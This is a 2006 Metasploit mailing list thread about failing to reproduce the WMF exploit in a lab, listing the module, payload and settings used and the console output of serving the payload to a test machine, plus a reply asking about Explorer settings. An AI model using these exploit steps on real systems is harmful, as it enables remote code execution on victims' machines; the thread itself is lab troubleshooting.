Metasploit mailing list archives
unable to reproduce WMF exploit
From: devin.ertel at gmail.com (Devin Ertel)
Date: Tue, 10 Jan 2006 07:37:03 -0600
What app is associated with the wmf file? Also, when you view it in Explorer, do you have thumbnails turned on?

/dev/null wrote:
> Sorry for the off-topic...
>
> Seems that everybody was able to reproduce the WMF exploit except me :)
>
> Here are the steps I performed:
> - use ie_xp_pfv_metafile
> - set PAYLOAD win32_exec
> - set CMD cmd.exe
> - exploit
>
> msf ie_xp_pfv_metafile(win32_exec) > exploit
> [*] Waiting for connections to http://192.168.0.1:8080/
> [*] HTTP Client connected from 192.168.0.10:1075, sending 1592 bytes of payload...
>
> The file is saved on disk, but when I open the directory in Windows Explorer nothing happens. Well, a few times explorer.exe crashed, but that's all. No cmd.exe execution.
>
> I don't have indexing disabled... I have tried even with the old versions of the exploit, I have tried with Gzip and chunked disabled, I have tried with EXITPROC seh and thread, I used FF, IE and even wget. I don't have DEP enabled, I don't use any AV on my test box...
>
> The most amazing thing: when I try calc.bmp generated by Mr. Moore it works like a charm...
>
> Obviously I am doing something wrong.